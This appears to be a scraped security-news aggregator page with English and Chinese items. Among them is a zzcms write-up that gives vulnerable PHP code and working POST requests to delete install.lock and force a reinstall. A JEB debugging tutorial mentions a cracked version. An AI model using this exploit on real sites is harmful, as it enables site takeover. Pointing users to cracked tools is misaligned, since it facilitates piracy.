Aggregator
A Billion Users Affected by Latest Yahoo Breach
Yahoo Inc. just revealed its second major breach in a year. Its first disclosure, taking place in September, claimed that...
The post A Billion Users Affected by Latest Yahoo Breach appeared first on McAfee Blog.
MS509团队获得Google致谢
Details of Denial of service vulnerability in Telephony
一言不和就造轮子之 CookieHelper
Opening Statement to the Intelligence & Security Committee 12 June 2016
Speaking Notes for the Opening Statement to the Intelligence & Security Committee by Andrew Hampton, Director, Government Communications Security Bureau.
"机器人防火墙":人机识别在应用安全及风控领域的一点实践 - r00tgrok
一个目录穿越引发的注入及后续——XG SDK漏洞回顾与思考
Trickbot Now Targeting German Banking Group Sparkassen-Finanzgruppe
From the Cloud to Drones: Threat Predictions for 2017
2016 has been quite the year. From widespread IoT attacks, to ransomware campaigns that extract millions of dollars, cyberthreats have...
The post From the Cloud to Drones: Threat Predictions for 2017 appeared first on McAfee Blog.
zzcms最新产品版任意文件删除(可导致重装)
先来看可以导致任意文件删除的地方,在E:/www/zzcms/user/delimg.php中第12行:
$id=$_REQUEST['id']; $sql="select img,img2,img3,flv,editor from zzcms_main where id ='$id'"; $rs=mysql_query($sql); $row=mysql_fetch_array($rs); if ($_REQUEST['action']==1){ if ($row['img']<>"/image/nopic.gif"){ $f="../".substr($row['img'],1); if (file_exists($f)){ unlink($f); }这里有一个任意文件删除的操作,也就是从zzcms_main中查询出来的img字段值做了一个删除操作。但是这个地方的$id虽然我们不能注入,但是是我们可控的,所以我们找一个入库的地方看看。
在/user/zssave.php中第107行:
if ($_POST["action"]=="add"){ $isok=mysql_query("Insert into zzcms_main(proname,bigclasszm,smallclasszm,shuxing,szm,prouse,gg,pricels,sm,img,img2,img3,flv,province,city,xiancheng,zc,yq,title,keywords,description,sendtime,timefororder,editor,userid,groupid,qq,comane,renzheng,skin) values('$cp_name','$bigclassid','$smallclassid','$shuxing','$szm','$gnzz','$gg','$lsj','$sm','$img1','$img2','$img3','$flv','$province','$city','$xiancheng','$zc','$yq','$title','$keyword','$discription','".date('Y-m-d H:i:s')."','$TimeNum','$username','$userid','$groupid','$qq','$comane','$renzheng','$skin')") ; $cpid=mysql_insert_id(); }elseif ($_POST["action"]=="modify"){ $oldimg1=trim($_POST["oldimg1"]); $oldimg2=trim($_POST["oldimg2"]); $oldimg3=trim($_POST["oldimg3"]); $oldflv=trim($_POST["oldflv"]); $isok=mysql_query("update zzcms_main set proname='$cp_name',bigclasszm='$bigclassid',smallclasszm='$smallclassid',shuxing='$shuxing',szm='$szm',prouse='$gnzz',gg='$gg',pricels='$lsj',sm='$sm',img='$img1',img2='$img2',img3='$img3',flv='$flv',province='$province',city='$city',xiancheng='$xiancheng',zc='$zc',yq='$yq',title='$title',keywords='$keyword',description='$discription',sendtime='".date('Y-m-d H:i:s')."',timefororder='$TimeNum',editor='$username',userid='$userid',groupid='$groupid',qq='$qq',comane='$comane',renzheng='$renzheng',skin='$skin',passed=0 where id='$cpid'");可以看到对应着action的不同,sql语句也不同,第一个是Insert,第二个update。我们看到在两个sql语句中都有img这个字段。并且相对应的的值$img1也是我们可控的:
$img1=$_POST["img1"];其次就是对于update语句,我们还能控制update哪一行,因为主键id的值也是我们可控的:
$cpid=$_POST["ypid"];所以结合上面所说,我们能够控制任意zzcms_main表中任意一行img字段的值,所以说我们能够删除任意文件。
漏洞利用:
首先为了防止zzcms_main表中没有任何数据,所以我们首先进行一个增加数据的操作:
payload:
然后我们开始更新第一行的img字段的值,payload:
http://localhost/user/zssave.php POST: action=modify&img1=/install/install.lock&ypid=1然后我们再进行删除操作:
http://localhost/user/delimg.php
POST: action=1&id=1
就能删除掉install.lock文件啦。然后开始重装:
Comments to New Zealand Institute of International Affairs
Protecting New Zealand’s digital assets in an interconnected world (29.11.16) by Andrew Hampton, Director GCSB.
jeb2.2.7动态调试apk
JEB是Android应用静态分析的de facto standard,除去准确的反编译结果、高容错性之外,JEB提供的API也方便了我们编写插件对源文件进行处理,实施反混淆甚至一些更高级的应用分析来方便后续的人工分析.jeb凭借其牛X的保护措施和高昂的售价,使得诸多普通逆向爱好者望而却步。
不过最近国内一些论坛爆出了jeb的2.2.7破解版本。据说jeb从2.2开始就支持动态调试了,在没有这个之前,我一直用的androidstudio+smalidea来进行调试的,比较麻烦。试用了一下jeb的动态调试功能表示很不错。
其实很简单,不过其中有几个小细节需要注意,首先打开我们的jeb,将apk拖入jeb,如图:
我们双击一下Bytecode。然后会出来两个窗口,一个是smali代码的窗口,一个是apk的结构,如图:
然后我们双击一个类,就可以调到该类的smali代码,如图,我双击KeyListener这个类:
就会自动跳转,这个时候按一下快捷键q就能反编译成伪代码,如图:
然后我们回到smali代码找个地方按ctrl+B下断点(取消断点也是改快捷方式),如图:
然后我们开始debug,点击这个按钮:
然后出现选择如图所示,选择设备和进程,带D的就是该apk的进程
注意:此时不要开启ddms,不然会出错的
然后点击attach,不出意外就能成功attach上了。
然后我们触发断点:
像这样,就说明成功触发了:
这个时候我们查看VM/Breakpoints这个窗口,就能看到变量的值了,但是这里有个小问题,可以看到v3这个地方应该是个字符串,但是显示的确实数字:
所以这个时候我们需要自己动手改一下啦,将int改为string,就能够正常显示啦!
可以看到自动显示了我们输入的字符串为balisong
这里比较方便的是,从伪代码也能看到该变量的值。
然后其余的比如F6可以单步步入,从上面菜单可以看到debug的功能。这里就不赘述了。
至于软件的下载方式,大家搜一搜,就能找到的。
好了,就到这里。
网络安全从业人员的“Black Friday”购物清单
Convenient Mobile Commerce is the Key to Success this Holiday Season
ASP.NET 上传图片
21st Century Bank Heist Strikes Tesco Bank, Could Portend Future Attacks
Last Tuesday, as Americans were filling out their ballots, about 40,000 U.K. citizens were left wondering what happened to their...
The post 21st Century Bank Heist Strikes Tesco Bank, Could Portend Future Attacks appeared first on McAfee Blog.
Q3 2016 DDoS Trends Report: UDP Flood Attacks Make Up 49 Percent of Attacks
Verisign just released its Q3 2016 DDoS Trends Report, which provides a unique view into online distributed denial of service (DDoS) attack trends from mitigations enacted on behalf of Verisign DDoS Protection Services and research conducted by Verisign iDefense Security Intelligence Services. User Datagram Protocol (UDP) flood attacks continue to dominate in Q3 2016, making […]
The post Q3 2016 DDoS Trends Report: UDP Flood Attacks Make Up 49 Percent of Attacks appeared first on Verisign Blog.